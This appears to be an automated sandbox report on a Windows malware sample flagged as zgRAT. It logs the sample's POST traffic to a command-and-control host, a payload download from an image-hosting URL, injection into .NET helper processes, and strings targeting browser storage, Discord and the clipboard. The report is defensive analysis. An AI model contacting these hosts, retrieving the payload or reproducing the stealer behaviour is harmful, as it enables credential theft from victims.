Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: rocketmusclesksj.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 49Host: rocketmusclesksj.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18158Host: rocketmusclesksj.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8779Host: rocketmusclesksj.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20432Host: rocketmusclesksj.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 7079Host: rocketmusclesksj.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1385Host: rocketmusclesksj.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 588083Host: rocketmusclesksj.shop

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /bLNQtdR/1667-Final.webp HTTP/1.1Host: i.ibb.coConnection: Keep-Alive

Source: InstallUtil.exe, 00000009.00000002.2485480778.0000000002CB9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: $^q3IndexedDB\https_www.youtube.com_0.indexeddb.leveldb@\^q equals www.youtube.com (Youtube)
Source: InstallUtil.exe, 00000009.00000002.2485480778.0000000002CB9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: IndexedDB\https_www.youtube.com_0.indexeddb.leveldb equals www.youtube.com (Youtube)
Source: InstallUtil.exe, 00000009.00000002.2485480778.0000000002CB9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: IndexedDB\https_www.youtube.com_0.indexeddb.leveldb@\^q equals www.youtube.com (Youtube)
Source: InstallUtil.exe, 00000009.00000002.2485480778.0000000002CB9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: IndexedDB\https_www.youtube.com_0.indexeddb.leveldb`,^q equals www.youtube.com (Youtube)
Source: InstallUtil.exe, 00000009.00000002.2485480778.0000000002CB9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: `,^q#www.youtube.com_0.indexeddb.leveldb equals www.youtube.com (Youtube)

Source: unknown

DNS traffic detected: queries for: i.ibb.co

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: rocketmusclesksj.shop

Source: 2M1NS61GG8.exe	String found in binary or memory: http://kolbi.cz
Source: AddInProcess32.exe, 00000004.00000002.2516044388.0000000005C44000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://purl.oen
Source: 2M1NS61GG8.exe, 00000000.00000002.2412254219.00000000030C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: 2M1NS61GG8.exe, 00000000.00000002.2434911785.0000000007392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: 2M1NS61GG8.exe, 00000000.00000002.2434911785.0000000007392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: 2M1NS61GG8.exe, 00000000.00000002.2434911785.0000000007392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: 2M1NS61GG8.exe, 00000000.00000002.2434911785.0000000007392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: 2M1NS61GG8.exe, 00000000.00000002.2434911785.0000000007392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: 2M1NS61GG8.exe, 00000000.00000002.2434911785.0000000007392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: 2M1NS61GG8.exe, 00000000.00000002.2434911785.0000000007392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: 2M1NS61GG8.exe, 00000000.00000002.2434911785.0000000007392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: 2M1NS61GG8.exe, 00000000.00000002.2434911785.0000000007392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: 2M1NS61GG8.exe, 00000000.00000002.2434911785.0000000007392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: 2M1NS61GG8.exe, 00000000.00000002.2434911785.0000000007392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: 2M1NS61GG8.exe, 00000000.00000002.2434911785.0000000007392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: 2M1NS61GG8.exe, 00000000.00000002.2434911785.0000000007392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: 2M1NS61GG8.exe, 00000000.00000002.2434911785.0000000007392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: 2M1NS61GG8.exe, 00000000.00000002.2434911785.0000000007392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: 2M1NS61GG8.exe, 00000000.00000002.2434911785.0000000007392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: 2M1NS61GG8.exe, 00000000.00000002.2434911785.0000000007392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: 2M1NS61GG8.exe, 00000000.00000002.2434911785.0000000007392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: 2M1NS61GG8.exe, 00000000.00000002.2434911785.0000000007392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: 2M1NS61GG8.exe, 00000000.00000002.2434911785.0000000007392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: 2M1NS61GG8.exe, 00000000.00000002.2434911785.0000000007392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: 2M1NS61GG8.exe, 00000000.00000002.2434911785.0000000007392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: 2M1NS61GG8.exe, 00000000.00000002.2434911785.0000000007392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: 2M1NS61GG8.exe, 00000000.00000002.2434911785.0000000007392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: 2M1NS61GG8.exe, 00000000.00000002.2434911785.0000000007392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: InstallUtil.exe, 00000009.00000002.2485480778.0000000002C9A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ip.s
Source: InstallUtil.exe, 00000009.00000002.2485480778.0000000002C9A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ip.sb/ip
Source: InstallUtil.exe, 00000009.00000002.2485480778.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://discord.com/api/v9/users/
Source: 2M1NS61GG8.exe, 00000000.00000002.2412254219.00000000030C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://i.ibb.co
Source: 2M1NS61GG8.exe	String found in binary or memory: https://i.ibb.co/bLNQtdR/1667-Final.webp
Source: AddInProcess32.exe, 00000008.00000002.2498975531.0000000000CD9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rocketmusclesksj.shop/%
Source: AddInProcess32.exe, 00000008.00000002.2502297595.0000000002E14000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://rocketmusclesksj.shop/0
Source: AddInProcess32.exe, 00000008.00000002.2498975531.0000000000C88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rocketmusclesksj.shop/api
Source: AddInProcess32.exe, 00000008.00000002.2498975531.0000000000C88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rocketmusclesksj.shop/api.
Source: AddInProcess32.exe, 00000008.00000002.2498975531.0000000000CD9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rocketmusclesksj.shop:443/api
Source: 2M1NS61GG8.exe, 00000000.00000002.2412254219.0000000003110000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.anon.com/frit/asfta.dara

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 169.197.85.95:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.129.243:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.129.243:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.129.243:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.129.243:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.129.243:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.129.243:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.129.243:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.129.243:443 -> 192.168.2.4:49749 version: TLS 1.2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 8_2_0042E280 GetWindowInfo,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

8_2_0042E280

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 8_2_0042E280 GetWindowInfo,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

8_2_0042E280

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 8_2_0042E490 GetDC,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject,

8_2_0042E490

Source: InstallUtil.exe, 00000009.00000002.2485480778.0000000002E1E000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: GetRawInputData

memstr_a6320bf9-5

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File created: C:\Users\user\AppData\Local\Temp\TmpE8D6.tmp			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File created: C:\Users\user\AppData\Local\Temp\TmpE8B6.tmp			Jump to dropped file

System Summary

Malicious sample detected (through community Yara rule)

Source: 4.2.AddInProcess32.exe.3939ec0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 4.2.AddInProcess32.exe.3939ec0.1.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 4.2.AddInProcess32.exe.3afcb18.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 4.2.AddInProcess32.exe.3ad4af8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 4.2.AddInProcess32.exe.3ad4af8.2.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 4.2.AddInProcess32.exe.3afcb18.0.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 9.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen

.NET source code contains very large array initializations

Source: 4.2.AddInProcess32.exe.3afcb18.0.raw.unpack, Strings.cs	Large array initialization: Strings: array initializer size 6160
Source: 4.2.AddInProcess32.exe.3939ec0.1.raw.unpack, Strings.cs	Large array initialization: Strings: array initializer size 6160

Source: C:\Users\user\Desktop\2M1NS61GG8.exe

Code function: 0_2_083D1FF8 CreateProcessAsUserW,

0_2_083D1FF8

Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_013F1FE0	0_2_013F1FE0
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_02F78AD9	0_2_02F78AD9
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_02F74A68	0_2_02F74A68
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_02F7DBF0	0_2_02F7DBF0
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_02F75483	0_2_02F75483
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_02F741F0	0_2_02F741F0
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_02F77280	0_2_02F77280
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_02F78640	0_2_02F78640
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_02F78630	0_2_02F78630
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_02F7BFE8	0_2_02F7BFE8
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_02F7D3E8	0_2_02F7D3E8
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_02F76F79	0_2_02F76F79
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_02F734E9	0_2_02F734E9
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_02F788D0	0_2_02F788D0
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_02F788C0	0_2_02F788C0
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_02F76874	0_2_02F76874
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_02F78438	0_2_02F78438
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_02F78428	0_2_02F78428
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_02F7CDE8	0_2_02F7CDE8
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_02F77DE8	0_2_02F77DE8
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_02F725D8	0_2_02F725D8
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_02F77DD8	0_2_02F77DD8
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_02F79590	0_2_02F79590
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_02F7414B	0_2_02F7414B
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_02F8CD24	0_2_02F8CD24
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_083D08C8	0_2_083D08C8
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_083D2A78	0_2_083D2A78
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_083D7BF0	0_2_083D7BF0
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_083D0BE0	0_2_083D0BE0
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_083D2D20	0_2_083D2D20
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_083DB728	0_2_083DB728
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_083DF7B9	0_2_083DF7B9
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_083D087A	0_2_083D087A
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_083D2A68	0_2_083D2A68
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_083D0260	0_2_083D0260
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_083D0251	0_2_083D0251
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_083D1298	0_2_083D1298
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_083D3318	0_2_083D3318
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_083D53A0	0_2_083D53A0
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_083D8398	0_2_083D8398
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_083D0BD1	0_2_083D0BD1
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_083D5408	0_2_083D5408
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_083D57B0	0_2_083D57B0
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_08490040	0_2_08490040
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_08498860	0_2_08498860
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_0849E550	0_2_0849E550
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_084969E8	0_2_084969E8
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_08498AD0	0_2_08498AD0
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_08493698	0_2_08493698
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_08496C49	0_2_08496C49
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_08496C58	0_2_08496C58
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_08498058	0_2_08498058
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_08498851	0_2_08498851
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_08493470	0_2_08493470
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_08490006	0_2_08490006
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_0849802E	0_2_0849802E
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_08493480	0_2_08493480
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_0849C480	0_2_0849C480
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_08494140	0_2_08494140
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_084969D7	0_2_084969D7
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_084941E8	0_2_084941E8
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_084931E0	0_2_084931E0
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_084931F0	0_2_084931F0
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_08492988	0_2_08492988
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_08492998	0_2_08492998
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_08497A49	0_2_08497A49
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_08497A58	0_2_08497A58
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_0849BE18	0_2_0849BE18
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_08491E2A	0_2_08491E2A
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_08491E30	0_2_08491E30
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_08498AC1	0_2_08498AC1
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_08493689	0_2_08493689
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_084997C9	0_2_084997C9
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_08492FD8	0_2_08492FD8
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_08492FE8	0_2_08492FE8
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_08499BFA	0_2_08499BFA
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_0849C798	0_2_0849C798
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_08499BA3	0_2_08499BA3
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_08D160B0	0_2_08D160B0
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_08D1B9F0	0_2_08D1B9F0
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_08D16948	0_2_08D16948
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_08D17298	0_2_08D17298
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_08D1EA10	0_2_08D1EA10
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_08D18208	0_2_08D18208
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_08D14329	0_2_08D14329
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_08D10DE8	0_2_08D10DE8
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_08D16061	0_2_08D16061
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_08D16007	0_2_08D16007
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_08D1A838	0_2_08D1A838
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_08D16946	0_2_08D16946
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_08D17296	0_2_08D17296
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_08D1A3B8	0_2_08D1A3B8
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_08D14353	0_2_08D14353
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_08D1AB28	0_2_08D1AB28
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_08D154DF	0_2_08D154DF
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_08D154F0	0_2_08D154F0
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_08D1A5D8	0_2_08D1A5D8
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_08D19D10	0_2_08D19D10
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_0E741650	0_2_0E741650
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_0E74F750	0_2_0E74F750
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_0E74C5E8	0_2_0E74C5E8
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_0E74D268	0_2_0E74D268
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_0E74BFEB	0_2_0E74BFEB
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_0E745A2C	0_2_0E745A2C
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_0E745840	0_2_0E745840
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_0E745839	0_2_0E745839
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_0E74591D	0_2_0E74591D
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_0E74164E	0_2_0E74164E
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_0E74F740	0_2_0E74F740
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_0E74C593	0_2_0E74C593
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_0E74D259	0_2_0E74D259
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_0E74C008	0_2_0E74C008
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_0E7440C0	0_2_0E7440C0
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_0E7440B1	0_2_0E7440B1
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_0E77B648	0_2_0E77B648
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_0E77B010	0_2_0E77B010
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_0E77D000	0_2_0E77D000
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_0E77C4A0	0_2_0E77C4A0
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_0E777B90	0_2_0E777B90
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_0E778EF8	0_2_0E778EF8
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_0E7745C8	0_2_0E7745C8
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_0E7745B8	0_2_0E7745B8
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_0E77BFA8	0_2_0E77BFA8
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_0E774191	0_2_0E774191
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_0E792618	0_2_0E792618
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_0E79DEC8	0_2_0E79DEC8
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_0E7956B8	0_2_0E7956B8
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_0E79FB90	0_2_0E79FB90
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_0E79B8A8	0_2_0E79B8A8
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_0E79D001	0_2_0E79D001
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_0E798640	0_2_0E798640
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_0E79DE38	0_2_0E79DE38
